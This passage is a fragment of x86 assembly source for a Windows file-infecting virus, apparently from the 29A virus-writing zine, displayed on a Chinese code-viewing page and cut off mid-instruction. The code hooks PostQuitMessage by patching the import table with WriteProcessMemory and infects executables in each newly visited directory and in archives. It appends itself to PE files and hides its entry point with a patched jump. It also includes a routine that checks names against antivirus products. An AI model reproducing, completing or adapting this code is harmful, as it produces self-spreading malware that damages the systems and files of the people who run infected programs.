📄 29a-7.006
字号:
or ah,ah
jnz avStrLoop
clc
mov al,0f9h
itIsAV equ $-1
pop esi
ret
; - findf.inc EOF -
; - hooks.inc BOF -
hookmtx dd 0 ; mutex for multi-threading calls
hookDll db "USER32",0
hookFc1 db "PostQuitMessage",0
;
; Just check for directory changes and infect then all files there.
;
setupPerProcess:
lea eax,[hookDll+ebp]
push eax
call dword [_LoadLibraryA+ebp]
or eax,eax
jz failedToHook
lea esi,[hookFc1+ebp]
push esi
push eax
call dword [_GetProcAddress+ebp]
mov ecx,eax
mov [PostQuitMessageHA+ebp],eax
lea esi,[PostQuitMessageH+ebp]
call APIHook
xor eax,eax
mov [hookmtx+ebp],eax ; hook ready
failedToHook:
ret
;
; the hook
;
PostQuitMessageH:
push dword 12345678h
PostQuitMessageHA equ $-4
pushad ; save all
pushfd
call getDelta
mov eax,[hookmtx+ebp] ; ready to infect?
or eax,eax
jnz hookFailed
inc dword [hookmtx+ebp] ; do not disturb
; path0 has current work directory
lea esi,[path1+ebp]
push esi
push dword 260
call dword [_GetCurrentDirectoryA+ebp]
or eax,eax
jz endHook
mov ecx,eax ; if we're still into
lea esi,[path0+ebp] ; the same folder, avoid
lea edi,[path1+ebp] ; infect more files
rep cmpsb
je endHook
mov ecx,eax ; update folder
lea esi,[path1+ebp]
lea edi,[path0+ebp]
rep movsb
call scandirpe ; infect new work
; folder
call findArchives
endHook:
dec dword [hookmtx+ebp] ; ready again
hookFailed:
popfd
popad
ret
;
; My nice (and old) API hook routine.
;
APIHook:
push esi
mov edx,[baseAddr+ebp] ; remember to fix it after
; (probably) reloc!
mov edi,edx
add edi,[edx+3ch] ; begin PE header
mov edi,[edi+80h] ; RVA import
or edi,edi ; uh? no imports??? :)
jz near _skipHookErr
add edi,edx ; add base addr
_searchusrImp:
mov esi,[edi+0ch] ; get name
or esi,esi ; check is not last
jz _skipHookErr
add esi,edx ; add base addr
mov ebx,[esi]
or ebx,20202020h
cmp ebx,"user" ; look for module
jne _nextName
mov bx,[esi+4]
cmp bx,"32" ; module found
je _usrImpFound
_nextName: ; if not found check
add edi,14h ; name of next import
mov esi,[edi] ; module
or esi,esi
jz _skipHookErr
jmp _searchusrImp
_usrImpFound: ; now we have user32
mov esi,[edi+10h] ; get address table
or esi,esi ; heh
jz _skipHookErr
add esi,edx ; add base addr again
mov edi,ecx ; search for API
_nextImp:
lodsd ; get addrs
or eax,eax ; chek is not last
jz _skipHookErr
cmp eax,edi ; cmp with API addr
je _doHook ; found? hook!
jmp _nextImp ; check next in table
_doHook:
sub esi,4
push esi ; save import addr
call dword [_GetCurrentProcess+ebp]
pop esi
pop edx
mov [fileSize+ebp],edx ; tmp storage
lea edi,[padding+ebp]
push edi ; shit
push dword 4
lea edi,[fileSize+ebp]
push edi ; bytes to write
push esi ; where to write
push eax ; current process
call dword [_WriteProcessMemory+ebp]
_skipHook:
ret
_skipHookErr:
pop esi
xor eax,eax
ret
; - hooks.inc EOF -
; - infectpe.inc BOF -
; pretty standard padding value, the idea is several viruses use the
; same value to avoid av can use easy ways to manage them
PADDING equ 101
infectpe:
push esi
push esi
call dword [_GetFileAttributesA+ebp]
pop esi
inc eax
jz near infectionError
dec eax
mov dword [fileAttrib+ebp],eax
push esi
push dword 80h
push esi
call dword [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz near infectionError
push esi
xor eax,eax
push eax
push dword 80h
push dword 3
push eax
push eax
push dword (80000000h | 40000000h)
push esi
call dword [_CreateFileA+ebp]
inc eax
jz near infectionErrorAttrib
dec eax
mov [fHnd+ebp],eax
push dword 0
push eax
call dword [_GetFileSize+ebp]
inc eax
jz near infectionErrorClose
dec eax
mov [fileSize+ebp],eax
lea eax,[fileTime2+ebp]
push eax
add eax,-8
push eax
add eax,-8
push eax
push dword [fHnd+ebp]
call dword [_GetFileTime+ebp]
or eax,eax
jz near infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push dword 4
push eax
push dword [fHnd+ebp]
call dword [_CreateFileMappingA+ebp]
or eax,eax
jz near infectionErrorClose
mov dword [fhmap+ebp],eax
xor eax,eax
push eax
push eax
push eax
push dword 6
push dword [fhmap+ebp]
call dword [_MapViewOfFile+ebp]
or eax,eax
jz near infectionErrorCloseMap
mov [mapMem+ebp],eax
mov edi,eax
cmp word [edi],'MZ'
jne near infectionErrorCloseUnmap
add edi,[edi+3ch]
cmp eax,edi
jae near infectionErrorCloseUnmap
add eax,[fileSize+ebp]
cmp eax,edi
jbe near infectionErrorCloseUnmap
cmp word [edi],'PE'
jne near infectionErrorCloseUnmap
movzx edx,word [edi+16h]
test edx,2h
jz near infectionErrorCloseUnmap
test edx,2000h
jnz near infectionErrorCloseUnmap
mov dx,[edi+5ch]
dec edx
jz near infectionErrorCloseUnmap
mov esi,edi
mov eax,18h
add ax,[edi+14h]
add edi,eax
mov cx,[esi+06h]
dec cx
mov eax,28h
mul cx
add edi,eax
mov eax,dword [esi+80h] ; 1st we need just one
or eax,eax ; import from k32
jz near infectionErrorCloseUnmap
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
xchg eax,edx
k32imploop:
mov eax,dword [edx+0ch]
or eax,eax
jz near infectionErrorCloseUnmap
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
mov ebx,dword [eax]
or ebx,20202020h
cmp ebx,'kern'
jne nextImpMod
mov ebx,dword [eax+4]
or ebx,00002020h
cmp ebx,'el32'
je k32ImpFound
nextImpMod:
add edx,14h
mov eax,dword [edx]
or eax,eax
jz near infectionErrorCloseUnmap
jmp k32imploop
k32ImpFound:
mov eax,[edx+10h]
or eax,eax
jz near infectionErrorCloseUnmap
mov edx,eax
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
mov eax,[eax]
or eax,eax
jz near infectionErrorCloseUnmap
add edx,[esi+34h]
mov [__imp__+ebp],edx ; we got 1st import
; that will be used to
; get k32 addr in run-time
mov eax,[edi+14h]
add eax,[edi+10h]
mov [virusBeginRaw+ebp],eax
mov eax,[edi+0ch] ; sect rva
add eax,[edi+10h] ; sect raw size
mov [relocTMP+ebp],eax
mov ecx,[esi+34h]
mov [baseAddr+ebp],ecx
add [relocTMP+ebp],ecx
mov eax,[esi+28h]
mov [hostEPTMP+ebp],eax ; reloc and EP ok, now EPO
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
; we look for...
;
; mov [fs:00000000],esp
; or...
;
; mov esp,ebp
; pop ebp
; ret
; db ffh,ffh,ffh,ffh
; or db 00h,00h,00h,00h
;
; and that's ok.
;
push eax
mov ecx,200h
checkNextAddr:
inc eax
cmp dword [eax],00258964h
jne addrNotFound0
cmp dword [eax+3],00000000h
je addrFound
addrNotFound0:
cmp dword [eax],0c35de58bh
jne addrNotFound1
cmp dword [eax+4],-1
je addrFound
cmp dword [eax+4],0
je addrFound
addrNotFound1:
dec ecx
jnz checkNextAddr
pop eax
push eax
addrFound:
pop edx
sub eax,edx
mov edx,eax
add edx,[esi+34h]
add eax,[hostEPTMP+ebp]
add [hostEPTMP+ebp],edx
call rva2raw
jc near infectionErrorCloseUnmap
add eax,[mapMem+ebp]
push esi
push edi
mov esi,eax
push esi
lea edi,[epobuffTMP+ebp]
mov ecx,5
rep movsb
pop edi
mov al,0e9h
stosb
mov eax,[relocTMP+ebp]
sub eax,[hostEPTMP+ebp]
sub eax,5
stosd
pop edi
pop esi
xor eax,eax
mov [esi+58h],eax
or dword [edi+24h],0c0000000h
and dword [edi+24h],~(02000000h | 10000000h)
mov eax,vSize
add eax,[edi+10h] ; raw size
xor edx,e⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -